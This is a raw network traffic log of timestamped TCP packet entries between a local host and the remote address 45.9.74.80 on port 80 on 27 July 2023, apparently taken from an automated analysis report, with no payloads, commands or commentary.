Jul 27, 2023 20:18:59.761873007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761890888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761904955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.761917114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761934996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761954069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761975050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.761982918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762001038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762025118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762033939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762046099 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762058973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762077093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762100935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762106895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762119055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762131929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762150049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762168884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762187004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762195110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762212992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762223959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762238979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762257099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762275934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762284040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762304068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762310028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762326956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762347937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762353897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762382030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762399912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762420893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762428045 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762444019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762451887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762470007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762487888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762496948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762516022 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762528896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762541056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762561083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762578964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762595892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762604952 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762622118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762635946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762648106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762655973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762674093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762691021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762707949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762715101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762732029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762748957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762757063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762773991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762790918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762803078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762816906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762834072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762844086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762861967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762881994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762887955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762906075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762923956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762940884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762948990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762967110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.762979031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.762993097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.763000011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.772538900 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.777326107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.777357101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.777375937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.777394056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.777479887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.781148911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.783102989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785178900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785204887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785223961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785275936 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785455942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785490036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785499096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785517931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785537958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785556078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785577059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785582066 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785599947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785619974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.785625935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785650015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785685062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.785984993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786228895 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786250114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786273003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786290884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786309004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786318064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786334991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786353111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786372900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786377907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786396027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786403894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786422014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786431074 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786448002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786465883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786484003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786492109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786509037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786516905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786787987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786839008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786856890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786875963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786890984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786902905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786921024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786935091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786948919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786953926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786972046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.786982059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.786998034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787013054 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787028074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787045956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787055016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787071943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787081003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787101030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787106037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787122965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787128925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787147045 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787154913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787173033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787182093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787195921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787208080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787223101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787242889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787249088 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787266016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787276030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787291050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787300110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787317991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787327051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787343025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787350893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787369013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787377119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787394047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787401915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787420034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787429094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787445068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787453890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787468910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787477970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787494898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787504911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787520885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787529945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787547112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787559032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787571907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787581921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787599087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787606955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787625074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787632942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787650108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787657976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787676096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787683964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787700891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787710905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787727118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787734985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787751913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787760973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787776947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787786961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787805080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787812948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787828922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787841082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787853956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787863016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787878036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787894964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787910938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787926912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787938118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787955999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787966967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.787981033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.787998915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788007021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788023949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788033962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788048983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788058043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788074970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788090944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788109064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788126945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788134098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788151026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788167953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788176060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788191080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.788202047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788218975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.788239002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.795376062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.805361986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.805409908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.805495024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.808495045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808532000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808557987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808583021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808607101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808626890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.808640003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.808654070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.808672905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808697939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808721066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808743954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808754921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.808777094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.808787107 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.809140921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809165001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809190035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809206963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.809230089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.809597969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809622049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809705019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.809750080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.810077906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810102940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810117006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.810256004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810281038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810305119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810318947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.810343981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810350895 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.810373068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810395956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.810425997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.811938047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.811985016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812040091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812063932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812118053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812161922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812170029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812220097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812251091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812355995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812381029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812402964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812417030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812441111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812450886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812511921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812536001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812561035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812571049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812597036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812603951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812659979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812685013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812721014 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812755108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812778950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812788963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812813044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812836885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812901020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812911987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812935114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.812946081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812969923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.812994003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813016891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813028097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813050985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813142061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813179016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813210964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813249111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813266039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813366890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813402891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813427925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813440084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813467026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813474894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813498020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813522100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813544989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813555956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813577890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813586950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813649893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813674927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813698053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.813708067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.813734055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.827750921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.827795982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.827922106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.831998110 CEST	80	49693	45.9.74.80	192.168.2.4
